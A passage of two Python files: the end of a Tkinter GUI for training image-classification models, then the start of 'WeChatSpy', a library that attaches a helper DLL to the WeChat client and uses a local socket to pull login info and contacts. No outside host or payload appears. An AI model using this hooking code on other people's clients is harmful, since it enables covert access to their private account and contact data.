self.batch_size_val = tk.IntVar()
self.batch_size_val.set(64)
self.batch_size_entry = ttk.Entry(self.parent, textvariable=self.batch_size_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.batch_size_entry,
target=self.batch_size_text,
width=40,
height=20,
tiny_space=True
)
# 验证批次大小 - 标签
self.validation_batch_size_text = ttk.Label(self.parent, text='Validation BatchSize', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.validation_batch_size_text,
target=self.batch_size_entry,
width=120,
height=20,
tiny_space=False
)
# 验证批次大小 - 输入框
self.validation_batch_size_val = tk.IntVar()
self.validation_batch_size_val.set(300)
self.validation_batch_size_entry = ttk.Entry(self.parent, textvariable=self.validation_batch_size_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.validation_batch_size_entry,
target=self.validation_batch_size_text,
width=40,
height=20,
tiny_space=True
)
# ============================= Group 5 =====================================
self.label_frame_project = ttk.Labelframe(self.parent, text='Project Configuration')
self.layout_utils.below_widget(
src=self.label_frame_project,
target=self.label_frame_train,
width=790,
height=60,
tiny_space=True
)
# 项目名 - 标签
self.project_name_text = ttk.Label(self.parent, text='Project Name', anchor=tk.W)
self.layout_utils.inside_widget(
src=self.project_name_text,
target=self.label_frame_project,
width=90,
height=20
)
# 项目名 - 下拉输入框
self.comb_project_name = ttk.Combobox(self.parent)
self.layout_utils.next_to_widget(
src=self.comb_project_name,
target=self.project_name_text,
width=430,
height=20,
tiny_space=True
)
self.comb_project_name.bind(
sequence="<Return>",
func=lambda x: self.project_name_fill_callback(x)
)
self.comb_project_name.bind(
sequence="<Button-1>",
func=lambda x: self.fetch_projects()
)
self.comb_project_name.bind("<<ComboboxSelected>>", lambda x: self.read_conf(x))
# 保存配置 - 按钮
self.btn_save_conf = ttk.Button(
self.parent, text='Save Configuration', command=lambda: self.save_conf()
)
self.layout_utils.next_to_widget(
src=self.btn_save_conf,
target=self.comb_project_name,
width=130,
height=24,
tiny_space=False,
offset_y=-2
)
# 删除项目 - 按钮
self.btn_delete = ttk.Button(
self.parent, text='Delete', command=lambda: self.delete_project()
)
self.layout_utils.next_to_widget(
src=self.btn_delete,
target=self.btn_save_conf,
width=80,
height=24,
tiny_space=False,
)
# ============================= Group 6 =====================================
self.label_frame_dataset = ttk.Labelframe(
self.parent, text='Sample Dataset'
)
self.layout_utils.below_widget(
src=self.label_frame_dataset,
target=self.label_frame_project,
width=790,
height=170,
tiny_space=True
)
# 附加训练集 - 按钮
self.btn_attach_dataset = ttk.Button(
self.parent,
text='Attach Dataset',
command=lambda: self.attach_dataset()
)
self.layout_utils.inside_widget(
src=self.btn_attach_dataset,
target=self.label_frame_dataset,
width=120,
height=24,
)
# 附加训练集 - 显示框
self.attach_dataset_val = tk.StringVar()
self.attach_dataset_val.set('')
self.attach_dataset_entry = ttk.Entry(
self.parent, textvariable=self.attach_dataset_val, justify=tk.LEFT, state=tk.DISABLED
)
self.layout_utils.next_to_widget(
src=self.attach_dataset_entry,
target=self.btn_attach_dataset,
width=420,
height=24,
tiny_space=True
)
# 验证集数目 - 标签
self.validation_num_text = ttk.Label(self.parent, text='Validation Set Num', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.validation_num_text,
target=self.attach_dataset_entry,
width=120,
height=20,
tiny_space=False,
offset_y=2
)
# 验证集数目 - 输入框
self.validation_num_val = tk.IntVar()
self.validation_num_val.set(300)
self.validation_num_entry = ttk.Entry(self.parent, textvariable=self.validation_num_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.validation_num_entry,
target=self.validation_num_text,
width=71,
height=20,
tiny_space=True
)
# 训练集路径 - 标签
self.dataset_train_path_text = ttk.Label(self.parent, text='Training Dataset', anchor=tk.W)
self.layout_utils.below_widget(
src=self.dataset_train_path_text,
target=self.btn_attach_dataset,
width=100,
height=20,
tiny_space=False
)
# 训练集路径 - 列表框
self.dataset_train_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.layout_utils.next_to_widget(
src=self.dataset_train_listbox,
target=self.dataset_train_path_text,
width=640,
height=36,
tiny_space=False
)
self.dataset_train_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.dataset_train_listbox)
)
self.listbox_scrollbar(self.dataset_train_listbox)
# 验证集路径 - 标签
label_edge = self.layout_utils.object_edge_info(self.dataset_train_path_text)
widget_edge = self.layout_utils.object_edge_info(self.dataset_train_listbox)
self.dataset_validation_path_text = ttk.Label(self.parent, text='Validation Dataset', anchor=tk.W)
self.dataset_validation_path_text.place(
x=label_edge['x'],
y=widget_edge['edge_y'] + self.layout['global']['space']['y'] / 2,
width=100,
height=20
)
# 验证集路径 - 下拉输入框
self.dataset_validation_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.layout_utils.next_to_widget(
src=self.dataset_validation_listbox,
target=self.dataset_validation_path_text,
width=640,
height=36,
tiny_space=False
)
self.dataset_validation_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.dataset_validation_listbox)
)
self.listbox_scrollbar(self.dataset_validation_listbox)
self.sample_map = {
DatasetType.Directory: {
RunMode.Trains: self.source_train_path_listbox,
RunMode.Validation: self.source_validation_path_listbox
},
DatasetType.TFRecords: {
RunMode.Trains: self.dataset_train_listbox,
RunMode.Validation: self.dataset_validation_listbox
}
}
# 开始训练 - 按钮
self.btn_training = ttk.Button(self.parent, text='Start Training', command=lambda: self.start_training())
self.layout_utils.widget_from_right(
src=self.btn_training,
target=self.label_frame_dataset,
width=120,
height=24,
tiny_space=True
)
# 终止训练 - 按钮
self.btn_stop = ttk.Button(self.parent, text='Stop', command=lambda: self.stop_training())
self.button_state(self.btn_stop, tk.DISABLED)
self.layout_utils.before_widget(
src=self.btn_stop,
target=self.btn_training,
width=60,
height=24,
tiny_space=True
)
# 编译模型 - 按钮
self.btn_compile = ttk.Button(self.parent, text='Compile', command=lambda: self.compile())
self.layout_utils.before_widget(
src=self.btn_compile,
target=self.btn_stop,
width=80,
height=24,
tiny_space=True
)
# 打包训练集 - 按钮
self.btn_make_dataset = ttk.Button(self.parent, text='Make Dataset', command=lambda: self.make_dataset())
self.layout_utils.before_widget(
src=self.btn_make_dataset,
target=self.btn_compile,
width=120,
height=24,
tiny_space=True
)
# 清除训练记录 - 按钮
self.btn_reset_history = ttk.Button(
self.parent, text='Reset History', command=lambda: self.reset_history()
)
self.layout_utils.before_widget(
src=self.btn_reset_history,
target=self.btn_make_dataset,
width=120,
height=24,
tiny_space=True
)
# 预测 - 按钮
self.btn_testing = ttk.Button(
self.parent, text='Testing', command=lambda: self.testing_model()
)
self.layout_utils.before_widget(
src=self.btn_testing,
target=self.btn_reset_history,
width=80,
height=24,
tiny_space=True
)
self.parent.geometry(size)
@staticmethod
def threading_exec(func, *args) -> threading.Thread:
th = threading.Thread(target=func, args=args)
th.setDaemon(True)
th.start()
return th
def popup_data_augmentation(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
data_augmentation = DataAugmentationDialog()
data_augmentation.read_conf(self.data_augmentation_entity)
def popup_pretreatment(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
pretreatment = PretreatmentDialog()
pretreatment.read_conf(self.pretreatment_entity)
@staticmethod
def listbox_scrollbar(listbox: tk.Listbox):
y_scrollbar = tk.Scrollbar(
listbox, command=listbox.yview
)
y_scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
listbox.config(yscrollcommand=y_scrollbar.set)
def blank_click(self, event):
if self.current_project != self.comb_project_name.get():
self.project_name_fill_callback(event)
def project_name_fill_callback(self, event):
suffix = '-{}-{}-H{}-{}-C{}'.format(
self.comb_neu_cnn.get(),
self.comb_recurrent.get(),
self.units_num_spin.get(),
self.comb_loss.get(),
self.comb_channel.get(),
)
current_project_name = self.comb_project_name.get()
if len(current_project_name) > 0 and current_project_name not in self.project_names:
self.sample_map[DatasetType.Directory][RunMode.Trains].delete(0, tk.END)
self.sample_map[DatasetType.Directory][RunMode.Validation].delete(0, tk.END)
if not current_project_name.endswith(suffix):
self.comb_project_name.insert(tk.END, suffix)
self.current_project = self.comb_project_name.get()
self.update_dataset_files_path(mode=RunMode.Trains)
self.update_dataset_files_path(mode=RunMode.Validation)
@property
def project_path(self):
if not self.current_project:
return None
project_path = "{}/{}".format(self.project_root_path, self.current_project)
if not os.path.exists(project_path):
os.makedirs(project_path)
return project_path
def update_dataset_files_path(self, mode: RunMode):
dataset_name = "dataset/{}.0.tfrecords".format(mode.value)
dataset_path = os.path.join(self.project_path, dataset_name)
dataset_path = dataset_path.replace("\\", '/')
self.sample_map[DatasetType.TFRecords][mode].delete(0, tk.END)
self.sample_map[DatasetType.TFRecords][mode].insert(tk.END, dataset_path)
self.save_conf()
def attach_dataset(self):
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
filename = filedialog.askdirectory()
if not filename:
return
model_conf = ModelConfig(self.current_project)
if not self.check_dataset(model_conf):
return
self.attach_dataset_val.set(filename)
self.sample_map[DatasetType.Directory][RunMode.Trains].insert(tk.END, filename)
self.button_state(self.btn_attach_dataset, tk.DISABLED)
for mode in [RunMode.Trains, RunMode.Validation]:
attached_dataset_name = model_conf.dataset_increasing_name(mode)
attached_dataset_name = "dataset/{}".format(attached_dataset_name)
attached_dataset_path = os.path.join(self.project_path, attached_dataset_name)
attached_dataset_path = attached_dataset_path.replace("\\", '/')
if mode == RunMode.Validation and self.validation_num_val.get() == 0:
continue
self.sample_map[DatasetType.TFRecords][mode].insert(tk.END, attached_dataset_path)
self.save_conf()
model_conf = ModelConfig(self.current_project)
self.threading_exec(
lambda: DataSets(model_conf).make_dataset(
trains_path=filename,
is_add=True,
callback=lambda: self.button_state(self.btn_attach_dataset, tk.NORMAL),
msg=lambda x: tk.messagebox.showinfo('Attach Dataset Status', x)
)
)
pass
@staticmethod
def button_state(btn: ttk.Button, state: str):
btn['state'] = state
def delete_project(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please select a project to delete."
)
return
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
project_path = "./projects/{}".format(self.current_project)
try:
shutil.rmtree(project_path)
except Exception as e:
messagebox.showerror(
"Error!", json.dumps(e.args, ensure_ascii=False)
)
messagebox.showinfo(
"Error!", "Delete successful!"
)
self.comb_project_name.delete(0, tk.END)
def reset_history(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please select a project first."
)
return
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
project_history_path = "./projects/{}/model".format(self.current_project)
try:
shutil.rmtree(project_history_path)
except Exception as e:
messagebox.showerror(
"Error!", json.dumps(e.args, ensure_ascii=False)
)
messagebox.showinfo(
"Error!", "Delete history successful!"
)
def testing_model(self):
filename = filedialog.askdirectory()
if not filename:
return
filename = filename.replace("\\", "/")
predict = Predict(project_name=self.current_project)
predict.testing(image_dir=filename, limit=self.validation_batch_size)
def clear_dataset(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please select a project first."
)
return
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
project_history_path = "./projects/{}/dataset".format(self.current_project)
try:
shutil.rmtree(project_history_path)
self.dataset_train_listbox.delete(1, tk.END)
self.dataset_validation_listbox.delete(1, tk.END)
except Exception as e:
messagebox.showerror(
"Error!", json.dumps(e.args, ensure_ascii=False)
)
messagebox.showinfo(
"Error!", "Clear dataset successful!"
)
@staticmethod
def popup_about():
messagebox.showinfo("About", "Image Classification Wizard Tool based on Deep Learning 1.0\n\nAuthor's mailbox: kerlomz@gmail.com\n\nQQ Group: 857149419")
def auto_loss(self, event):
if self.comb_recurrent.get() == 'NoRecurrent':
self.comb_loss.set("CrossEntropy")
@staticmethod
def get_param(src: dict, key, default=None):
result = src.get(key)
return result if result else default
def read_conf(self, event):
selected = self.comb_project_name.get()
self.current_project = selected
model_conf = ModelConfig(selected)
self.edit_var.set(model_conf.memory_usage)
self.size_val.set("[{}, {}]".format(model_conf.image_width, model_conf.image_height))
self.resize_val.set(json.dumps(model_conf.resize))
self.source_train_path_listbox.delete(0, tk.END)
self.source_validation_path_listbox.delete(0, tk.END)
self.dataset_validation_listbox.delete(0, tk.END)
self.dataset_train_listbox.delete(0, tk.END)
for source_train in self.get_param(model_conf.trains_path, DatasetType.Directory, default=[]):
self.source_train_path_listbox.insert(tk.END, source_train)
for source_validation in self.get_param(model_conf.validation_path, DatasetType.Directory, default=[]):
self.source_validation_path_listbox.insert(tk.END, source_validation)
self.label_num_spin.set(model_conf.max_label_num)
self.comb_channel.set(model_conf.image_channel)
self.comb_neu_cnn.set(model_conf.neu_cnn_param)
self.comb_recurrent.set(model_conf.neu_recurrent_param)
self.units_num_spin.set(model_conf.units_num)
self.comb_loss.set(model_conf.loss_func_param)
if isinstance(model_conf.category_param, list):
self.category_entry['state'] = tk.NORMAL
self.comb_category.set('CUSTOMIZED')
self.category_val.set(json.dumps(model_conf.category_param, ensure_ascii=False))
else:
self.category_entry['state'] = tk.DISABLED
self.comb_category.set(model_conf.category_param)
self.comb_optimizer.set(model_conf.neu_optimizer_param)
self.learning_rate_spin.set(model_conf.trains_learning_rate)
self.end_acc_val.set(model_conf.trains_end_acc)
self.end_cost_val.set(model_conf.trains_end_cost)
self.end_epochs_spin.set(model_conf.trains_end_epochs)
self.batch_size_val.set(model_conf.batch_size)
self.validation_batch_size_val.set(model_conf.validation_batch_size)
self.validation_num_val.set(model_conf.validation_set_num)
self.data_augmentation_entity.binaryzation = model_conf.da_binaryzation
self.data_augmentation_entity.median_blur = model_conf.da_median_blur
self.data_augmentation_entity.gaussian_blur = model_conf.da_gaussian_blur
self.data_augmentation_entity.equalize_hist = model_conf.da_equalize_hist
self.data_augmentation_entity.laplace = model_conf.da_laplace
self.data_augmentation_entity.warp_perspective = model_conf.da_warp_perspective
self.data_augmentation_entity.rotate = model_conf.da_rotate
self.data_augmentation_entity.sp_noise = model_conf.da_sp_noise
self.data_augmentation_entity.brightness = model_conf.da_brightness
self.data_augmentation_entity.hue = model_conf.da_hue
self.data_augmentation_entity.saturation = model_conf.da_saturation
self.data_augmentation_entity.gamma = model_conf.da_gamma
self.data_augmentation_entity.channel_swap = model_conf.da_channel_swap
self.data_augmentation_entity.random_blank = model_conf.da_random_blank
self.data_augmentation_entity.random_transition = model_conf.da_random_transition
self.pretreatment_entity.binaryzation = model_conf.pre_binaryzation
self.pretreatment_entity.replace_transparent = model_conf.pre_replace_transparent
self.pretreatment_entity.horizontal_stitching = model_conf.pre_horizontal_stitching
self.pretreatment_entity.concat_frames = model_conf.pre_concat_frames
self.pretreatment_entity.blend_frames = model_conf.pre_blend_frames
for dataset_validation in self.get_param(model_conf.validation_path, DatasetType.TFRecords, default=[]):
self.dataset_validation_listbox.insert(tk.END, dataset_validation)
for dataset_train in self.get_param(model_conf.trains_path, DatasetType.TFRecords, default=[]):
self.dataset_train_listbox.insert(tk.END, dataset_train)
return model_conf
@property
def validation_batch_size(self):
# if self.dataset_validation_listbox.size() > 1:
return self.validation_batch_size_val.get()
# else:
# return min(self.validation_batch_size_val.get(), self.validation_num_val.get())
@property
def device_usage(self):
return self.edit_var.get()
def save_conf(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
model_conf = ModelConfig(
project_name=self.current_project,
MemoryUsage=self.device_usage,
CNNNetwork=self.neu_cnn,
RecurrentNetwork=self.neu_recurrent,
UnitsNum=self.units_num_spin.get(),
Optimizer=self.optimizer,
LossFunction=self.loss_func,
Decoder=self.comb_loss.get(),
ModelName=self.current_project,
ModelField=ModelField.Image.value,
ModelScene=ModelScene.Classification.value,
Category=self.category,
Resize=self.resize,
ImageChannel=self.comb_channel.get(),
ImageWidth=self.image_width,
ImageHeight=self.image_height,
MaxLabelNum=self.label_num_spin.get(),
AutoPadding=True,
ReplaceTransparent=False,
HorizontalStitching=False,
OutputSplit='',
LabelFrom=LabelFrom.FileName.value,
ExtractRegex='.*?(?=_)',
LabelSplit='',
DatasetTrainsPath=self.dataset_value(
dataset_type=DatasetType.TFRecords, mode=RunMode.Trains
),
DatasetValidationPath=self.dataset_value(
dataset_type=DatasetType.TFRecords, mode=RunMode.Validation
),
SourceTrainPath=self.dataset_value(
dataset_type=DatasetType.Directory, mode=RunMode.Trains
),
SourceValidationPath=self.dataset_value(
dataset_type=DatasetType.Directory, mode=RunMode.Validation
),
ValidationSetNum=self.validation_num_val.get(),
SavedSteps=100,
ValidationSteps=500,
EndAcc=self.end_acc_val.get(),
EndCost=self.end_cost_val.get(),
EndEpochs=self.end_epochs_spin.get(),
BatchSize=self.batch_size_val.get(),
ValidationBatchSize=self.validation_batch_size,
LearningRate=self.learning_rate_spin.get(),
DA_Binaryzation=self.data_augmentation_entity.binaryzation,
DA_MedianBlur=self.data_augmentation_entity.median_blur,
DA_GaussianBlur=self.data_augmentation_entity.gaussian_blur,
DA_EqualizeHist=self.data_augmentation_entity.equalize_hist,
DA_Laplace=self.data_augmentation_entity.laplace,
DA_WarpPerspective=self.data_augmentation_entity.warp_perspective,
DA_Rotate=self.data_augmentation_entity.rotate,
DA_PepperNoise=self.data_augmentation_entity.sp_noise,
DA_Brightness=self.data_augmentation_entity.brightness,
DA_Saturation=self.data_augmentation_entity.saturation,
DA_Hue=self.data_augmentation_entity.hue,
DA_Gamma=self.data_augmentation_entity.gamma,
DA_ChannelSwap=self.data_augmentation_entity.channel_swap,
DA_RandomBlank=self.data_augmentation_entity.random_blank,
DA_RandomTransition=self.data_augmentation_entity.random_transition,
Pre_Binaryzation=self.pretreatment_entity.binaryzation,
Pre_ReplaceTransparent=self.pretreatment_entity.replace_transparent,
Pre_HorizontalStitching=self.pretreatment_entity.horizontal_stitching,
Pre_ConcatFrames=self.pretreatment_entity.concat_frames,
Pre_BlendFrames=self.pretreatment_entity.blend_frames,
)
model_conf.update()
return model_conf
def make_dataset(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
self.save_conf()
self.button_state(self.btn_make_dataset, tk.DISABLED)
model_conf = ModelConfig(self.current_project)
train_path = self.dataset_value(DatasetType.Directory, RunMode.Trains)
validation_path = self.dataset_value(DatasetType.Directory, RunMode.Validation)
if len(train_path) < 1:
messagebox.showerror(
"Error!", "{} Sample set has not been added.".format(RunMode.Trains.value)
)
self.button_state(self.btn_make_dataset, tk.NORMAL)
return
self.threading_exec(
lambda: DataSets(model_conf).make_dataset(
trains_path=train_path,
validation_path=validation_path,
is_add=False,
callback=lambda: self.button_state(self.btn_make_dataset, tk.NORMAL),
msg=lambda x: tk.messagebox.showinfo('Make Dataset Status', x)
)
)
@property
def size(self):
return self.json_filter(self.size_val.get(), int)
@property
def image_height(self):
return self.size[1]
@property
def image_width(self):
return self.size[0]
@property
def resize(self):
return self.json_filter(self.resize_val.get(), int)
@property
def neu_cnn(self):
return self.comb_neu_cnn.get()
@property
def neu_recurrent(self):
return self.comb_recurrent.get()
@property
def loss_func(self):
return self.comb_loss.get()
@property
def optimizer(self):
return self.comb_optimizer.get()
@staticmethod
def json_filter(content, item_type):
if not content:
messagebox.showerror(
"Error!", "To select a customized category, you must specify the category set manually."
)
return None
try:
content = json.loads(content)
except ValueError as e:
messagebox.showerror(
"Error!", "Input must be of type JSON."
)
return None
content = [item_type(i) for i in content]
return content
@property
def category(self):
comb_selected = self.comb_category.get()
if not comb_selected:
messagebox.showerror(
"Error!", "Please select built-in category or custom category first"
)
return None
if comb_selected == 'CUSTOMIZED':
category_value = self.category_entry.get()
category_value = category_value.replace("'", '"') if "'" in category_value else category_value
category_value = self.json_filter(category_value, str)
else:
category_value = comb_selected
return category_value
def dataset_value(self, dataset_type: DatasetType, mode: RunMode):
listbox = self.sample_map[dataset_type][mode]
value = list(listbox.get(0, listbox.size() - 1))
return value
def compile_task(self):
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
model_conf = ModelConfig(project_name=self.current_project)
if not os.path.exists(model_conf.model_root_path):
messagebox.showerror(
"Error", "Model storage folder does not exist."
)
return
if len(os.listdir(model_conf.model_root_path)) < 3:
messagebox.showerror(
"Error", "There is no training model record, please train before compiling."
)
return
try:
self.current_task = Trains(model_conf)
self.current_task.compile_graph(0)
status = 'Compile completed'
except Exception as e:
messagebox.showerror(
e.__class__.__name__, json.dumps(e.args, ensure_ascii=False)
)
status = 'Compile failure'
tk.messagebox.showinfo('Compile Status', status)
def compile(self):
self.job = self.threading_exec(
lambda: self.compile_task()
)
def training_task(self):
model_conf = ModelConfig(project_name=self.current_project)
self.current_task = Trains(model_conf)
try:
self.button_state(self.btn_training, tk.DISABLED)
self.button_state(self.btn_stop, tk.NORMAL)
self.is_task_running = True
self.current_task.train_process()
status = 'Training completed'
except Exception as e:
traceback.print_exc()
messagebox.showerror(
e.__class__.__name__, json.dumps(e.args, ensure_ascii=False)
)
status = 'Training failure'
self.button_state(self.btn_training, tk.NORMAL)
self.button_state(self.btn_stop, tk.DISABLED)
self.is_task_running = False
tk.messagebox.showinfo('Training Status', status)
@staticmethod
def check_dataset(model_conf):
trains_path = model_conf.trains_path[DatasetType.TFRecords]
validation_path = model_conf.validation_path[DatasetType.TFRecords]
if not trains_path or not validation_path:
messagebox.showerror(
"Error!", "Training set or validation set not defined."
)
return False
for tp in trains_path:
if not os.path.exists(tp):
messagebox.showerror(
"Error!", "Training set path does not exist, please make dataset first"
)
return False
for vp in validation_path:
if not os.path.exists(vp):
messagebox.showerror(
"Error!", "Validation set path does not exist, please make dataset first"
)
return False
return True
def start_training(self):
if not self.check_resize():
return
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
model_conf = self.save_conf()
if not self.check_dataset(model_conf):
return
self.job = self.threading_exec(
lambda: self.training_task()
)
def stop_training(self):
self.current_task.stop_flag = True
@property
def project_names(self):
return [i.name for i in os.scandir(self.project_root_path) if i.is_dir()]
def fetch_projects(self):
self.comb_project_name['values'] = self.project_names
def browse_dataset(self, dataset_type: DatasetType, mode: RunMode):
if not self.current_project:
messagebox.showerror(
"Error!", "Please define the project name first."
)
return
filename = filedialog.askdirectory()
if not filename:
return
is_sub = False
for i, item in enumerate(os.scandir(filename)):
if item.is_dir():
path = item.path.replace("\\", "/")
if self.sample_map[dataset_type][mode].size() == 0:
self.fetch_sample([path])
self.sample_map[dataset_type][mode].insert(tk.END, path)
if i > 0:
continue
is_sub = True
else:
break
if not is_sub:
filename = filename.replace("\\", "/")
if self.sample_map[dataset_type][mode].size() == 0:
self.fetch_sample([filename])
self.sample_map[dataset_type][mode].insert(tk.END, filename)
@staticmethod
def closest_category(category):
category = set(category)
category_group = dict()
for key in SIMPLE_CATEGORY_MODEL.keys():
category_set = set(category_extract(key))
if category <= category_set:
category_group[key] = len(category_set) - len(category)
if not category_group:
return None
min_index = min(category_group.values())
for k, v in category_group.items():
if v == min_index:
return k
def fetch_sample(self, dataset_path):
file_names = os.listdir(dataset_path[0])[0:100]
category = list()
len_label = -1
for file_name in file_names:
if "_" in file_name:
label = file_name.split("_")[0]
label = [i for i in label]
len_label = len(label)
category.extend(label)
category_pram = self.closest_category(category)
if not category_pram:
return
self.comb_category.set(category_pram)
size = PilImage.open(os.path.join(dataset_path[0], file_names[0])).size
self.size_val.set(json.dumps(size))
self.resize_val.set(json.dumps(size))
self.label_num_spin.set(len_label)
def listbox_delete_item_callback(self, event, listbox: tk.Listbox):
i = listbox.curselection()[0]
listbox.delete(i)
self.save_conf()
def comb_category_callback(self, event):
comb_selected = self.comb_category.get()
if comb_selected == 'CUSTOMIZED':
self.category_entry['state'] = tk.NORMAL
else:
self.category_entry.delete(0, tk.END)
self.category_entry['state'] = tk.DISABLED
def check_resize(self):
if self.loss_func == 'CTC':
return True
param = OUTPUT_SHAPE1_MAP[NETWORK_MAP[self.neu_cnn]]
shape1w = math.ceil(1.0*self.resize[0]/param[0])
shape1h = math.ceil(1.0*self.resize[1]/param[0])
input_s1 = shape1w * shape1h * param[1]
label_num = int(self.label_num_spin.get())
if input_s1 % label_num != 0:
messagebox.showerror(
"Error!", "Shape[1] = {} must divide the label_num = {}.".format(input_s1, label_num)
)
return False
return True
@staticmethod
def resource_path(relative_path):
try:
# PyInstaller creates a temp folder and stores path in _MEIPASS
base_path = sys._MEIPASS
except AttributeError:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
if __name__ == '__main__':
root = tk.Tk()
app = Wizard(root)
root.mainloop()
|
spy.py | import os
from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread
from .exceptions import ParserError
import logging
import warnings
from uuid import uuid4
from .proto import spy_pb2
from .command import *
from ctypes import cdll, c_char_p
class WeChatSpy:
def __init__(self, parser=None, key: str = None, logger: logging.Logger = None):
# 商用key
self.__key = key
# 日志模块
if isinstance(logger, logging.Logger):
# 使用自定义logger
self.logger = logger
else:
# 使用默认logger
self.logger = logging.getLogger(__file__)
formatter = logging.Formatter('%(asctime)s [%(threadName)s] %(levelname)s: %(message)s')
sh = logging.StreamHandler()
sh.setFormatter(formatter)
sh.setLevel(logging.DEBUG)
self.logger.addHandler(sh)
self.logger.setLevel(logging.DEBUG)
# socket数据处理函数
if callable(parser):
self.__parser = parser
else:
raise ParserError("Parser must be callable")
self.__port2client = dict()
self.__pid2port = dict()
host = "127.0.0.1"
port = 9527
self.__socket_server = socket(AF_INET, SOCK_STREAM)
self.__socket_server.bind((host, port))
self.__socket_server.listen(1)
t_start_server = Thread(target=self.__start_server)
t_start_server.daemon = True
t_start_server.name = "spy"
t_start_server.start()
current_path = os.path.split(os.path.abspath(__file__))[0]
helper_path = os.path.join(current_path, "SpyHelper.exe")
attach_thread = Thread(target=os.system, args=(helper_path,))
attach_thread.daemon = True
attach_thread.name = "attach"
attach_thread.start()
def __start_server(self):
while True:
socket_client, client_address = self.__socket_server.accept()
self.__port2client[client_address[1]] = socket_client
self.logger.info(f"A WeChat process from {client_address} successfully connected")
if self.__key:
self.set_commercial(self.__key, port=client_address[1])
t_socket_client_receive = Thread(target=self.receive, args=(socket_client, client_address))
t_socket_client_receive.name = f"wechat {client_address}"
t_socket_client_receive.daemon = True
t_socket_client_receive.start()
def receive(self, socket_client: socket, client_address: tuple):
recv_byte = b""
data_size = 0
while True:
try:
_bytes = socket_client.recv(4096)
except Exception as e:
return self.logger.warning(f"The WeChat process has disconnected: {e}")
recv_byte += _bytes
while True:
if not data_size:
if len(recv_byte) > 3:
data_size = int.from_bytes(recv_byte[:4], "little")
else:
break
elif data_size <= len(recv_byte) - 4:
data_byte = recv_byte[4: data_size + 4]
response = spy_pb2.Response()
response.ParseFromString(data_byte)
response.port = client_address[1]
recv_byte = recv_byte[data_size + 4:]
data_size = 0
if response.type == SYSTEM:
if response.info:
self.logger.info(f"{response.info}")
elif response.warning:
self.logger.warning(f"{response.warning}")
elif response.error:
self.logger.error(f"{response.error}")
else:
if response.type == WECHAT_CONNECTED:
self.__pid2port[response.pid] = client_address[1]
t = Thread(target=self.__parser, args=(response,))
t.name = f"wechat {client_address}"
t.daemon = True
t.start()
else:
break
def __send(self, request: spy_pb2.Request, pid: int = 0, port: int = 0):
if pid:
self.logger.warning(
"We recommend using the parameter 'port' to distinguish between multiple different WeChat clients.")
if not (port := self.__pid2port.get(pid)):
self.logger.error(f"Failure to find port by pid:{pid}")
return False
if not port and self.__port2client:
socket_client = list(self.__port2client.values())[0]
elif not (socket_client := self.__port2client.get(port)):
self.logger.error(f"Failure to find socket client by port:{port}")
return False
request.uuid = uuid4().__str__()
data = request.SerializeToString()
data_length_bytes = int.to_bytes(len(data), length=4, byteorder="little")
try:
socket_client.send(data_length_bytes + data)
return True
except Exception as e:
self.logger.warning(f"The WeChat process {port} has disconnected: {e}")
return False
def run(self, wechat: str, bit: int = 64):
current_path = os.path.split(os.path.abspath(__file__))[0]
if bit == 64:
dll_path = os.path.join(current_path, "SpyHelper_x64.dll")
else:
dll_path = os.path.join(current_path, "SpyHelper_x86.dll")
try:
dll = cdll.LoadLibrary(dll_path)
except FileNotFoundError:
self.logger.error("OpenHelper not found")
return 0
except OSError as e:
if e.errno == 8:
return self.run(wechat, 64) if bit != 64 else self.run(wechat, 32)
self.logger.error(e)
return 0
pid = dll.OpenWeChat(c_char_p(wechat.encode()))
return pid
def set_commercial(self, key: str, pid: int = 0, port: int = 0):
request = spy_pb2.Request()
request.cmd = SYSTEM
request.content = key
request.uuid = ""
self.__send(request, pid, port)
def get_login_info(self, pid: int = 0, port: int = 0):
"""
获取当前登录信息
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = LOGIN_INFO
return self.__send(request, pid, port)
def query_login_info(self, pid: int = 0, port: int = 0):
warnings.warn(
"The function 'query_login_info' is deprecated, and has been replaced by the function 'get_login_info'",
DeprecationWarning)
return self.get_login_info(pid, port)
def get_contacts(self, pid: int = 0, port: int = 0):
"""
获取联系人详情
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = CONTACTS
return self.__send(request, pid, port)
def query_contact_list(self, pid: int = 0, port: int = 0):
warnings.warn(
"The function 'query_contact_list' is deprecated, and has been replaced by the function 'get_contact_list'",
DeprecationWarning)
return self.get_contacts(pid, port)
def get_contact_details(self, wxid: str, update: bool = False, pid: int = 0, port: int = 0):
"""
获取联系人详情
:param wxid: 联系人wxid
:param update: 是否更新最新详情(需请求微信服务器 速度较慢)
:param pid:
:param port:
"""
request = spy_pb2.Request()
